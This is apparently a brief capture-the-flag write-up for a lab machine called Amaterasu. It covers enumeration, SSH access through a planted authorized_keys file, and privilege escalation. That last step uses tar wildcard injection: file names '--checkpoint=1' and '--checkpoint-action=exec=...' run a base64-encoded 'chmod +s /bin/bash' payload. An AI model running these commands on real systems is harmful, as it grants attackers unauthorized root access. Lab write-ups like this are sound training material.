Amaterasu 🔹
Enumeration
Feroxbustering port 33414 we find /info and /help
Initial Access
The user alfredo has a .ssh folder and there is a ssh port open so we can try to upload an authorized_keys files with a public one inside.
Get the flag
Privilege Escalation
Transfer pspy to the machine and we see a task executing.
We don't have permissions to edit the script but we see that tar is using a wildcard, so we can exploit that.
echo -n 'chmod +s /bin/bash' | base64
> Y2htb2QgK3MgL2Jpbi9iYXNo
touch -- "--checkpoint=1"
touch -- '--checkpoint-action=exec="echo Y2htb2QgK3MgL2Jpbi9iYXNo | base64 -d | bash"'
Post Exploitation
